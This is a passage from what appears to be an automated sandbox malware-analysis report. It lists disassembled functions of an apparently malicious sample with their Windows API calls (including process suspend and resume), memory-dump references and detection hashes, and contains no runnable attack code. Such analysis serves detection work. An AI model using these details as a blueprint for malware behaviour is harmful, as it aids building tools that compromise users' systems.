                              • CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACE2
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CloseHandleOpenSuspend
                              • String ID:
                              • API String ID: 1999457699-0
                              • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                              • Instruction ID: f0940f0a464cb9da12e036c8bcda16370f3965740af83b573a45ae51f9acba0f
                              • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                              • Instruction Fuzzy Hash: E7D0A733605131638221176A7C0CC87EE6CDFC1EB37024136F404C3220DA30C84186F4
                              Function 0041ACED Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                              Download Yara Rule
                              APIs
                              • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041ACF8
                              • NtResumeProcess.NTDLL(00000000), ref: 0041AD05
                              • CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD0E
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CloseHandleOpenResume
                              • String ID:
                              • API String ID: 3614150671-0
                              • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                              • Instruction ID: b64f47c6af987b25b68fadd97e6a7e629856a7b738c344dffca8a71896aa998e
                              • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                              • Instruction Fuzzy Hash: DFD0A733504132638220176A7C0CC87EDADDFC5EB37024236F404C3621DA34C841C6F4
                              Function 0044D5E9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: .
                              • API String ID: 0-248832578
                              • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                              • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                              • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                              • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                              Function 00450D42 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                              • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                              • String ID: <D
                              • API String ID: 1084509184-3866323178
                              • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                              • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                              • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                              • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                              Function 00450DDD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                              • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                              • String ID: <D
                              • API String ID: 1084509184-3866323178
                              • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                              • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                              • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                              • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                              Function 00447597 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: InfoLocale
                              • String ID: GetLocaleInfoEx
                              • API String ID: 2299586839-2904428671
                              • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                              • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                              • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                              • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                              Function 00440E20 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                              • Instruction ID: cffdc6bb8eb20f5336ace8b102e865ec7dcfb2cf624fb46ac032ba80a60d6a90
                              • Opcode Fuzzy Hash: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                              • Instruction Fuzzy Hash: 8A024C71E002199BEF14CFA9C9806AEBBF1FF88314F25826AD919E7350D735AD45CB84
                              Function 004520D2 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520CD,?,?,00000008,?,?,00455412,00000000), ref: 004522FF
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionRaise
                              • String ID:
                              • API String ID: 3997070919-0
                              • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                              • Instruction ID: 47108b7899804ebb5d40a9255b8f0d240b678f8396b787326aeb691ef157153f
                              • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                              • Instruction Fuzzy Hash: C0B18F351106089FD715CF28C586B567BE0FF06325F29869AEC99CF3A2C379E986CB44
                              Function 00432A49 Relevance: 1.8, Strings: 1, Instructions: 500COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 0
                              • API String ID: 0-4108050209
                              • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                              • Instruction ID: f72c02501a8b687524d4eed2bba9748ce27a8789a4669d3223b659a6f876a8a8
                              • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                              • Instruction Fuzzy Hash: 8002B3727083004BD714DF39D95272EF3E2AFCC758F15492EF499AB391DA78A8058A4A
                              Function 004510BA Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$_free$InfoLocale_abort
                              • String ID:
                              • API String ID: 1663032902-0
                              • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                              • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                              • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                              • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                              Function 004512EA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$InfoLocale_abort_free
                              • String ID:
                              • API String ID: 2692324296-0
                              • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                              • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                              • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                              • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                              Function 004470AE Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-0003D155,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
                              • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalEnterEnumLocalesSectionSystem
                              • String ID:
                              • API String ID: 1272433827-0
                              • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                              • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                              • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                              • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                              Function 00450CF7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                              • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                              • String ID:
                              • API String ID: 1084509184-0
                              • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                              • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                              • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                              • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                              Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                              Download Yara Rule
                              APIs
                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: InfoLocale
                              • String ID:
                              • API String ID: 2299586839-0
                              • Opcode ID: 2f0bd58ff2c46692be8fd04023cab22914861fe3b087e1ba55e03f3e1b92ba33
                              • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                              • Opcode Fuzzy Hash: 2f0bd58ff2c46692be8fd04023cab22914861fe3b087e1ba55e03f3e1b92ba33
                              • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                              Function 00433CD7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                              Download Yara Rule
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                              • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                              • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                              • Instruction Fuzzy Hash:
                              Function 0043CE3B Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: BG3i@
                              • API String ID: 0-2407888476
                              • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                              • Instruction ID: a817909710d0090f483bb13cdd1d1ee80d6dfae79024daed79820ace932836b2
                              • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                              • Instruction Fuzzy Hash: E361777160070966DA385A2858D6BBF6396EB0DB04F10391BE943FF3C1D61DAD43874E
                              Function 0043CC0C Relevance: 1.5, Strings: 1, Instructions: 214COMMONLIBRARYCODE
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
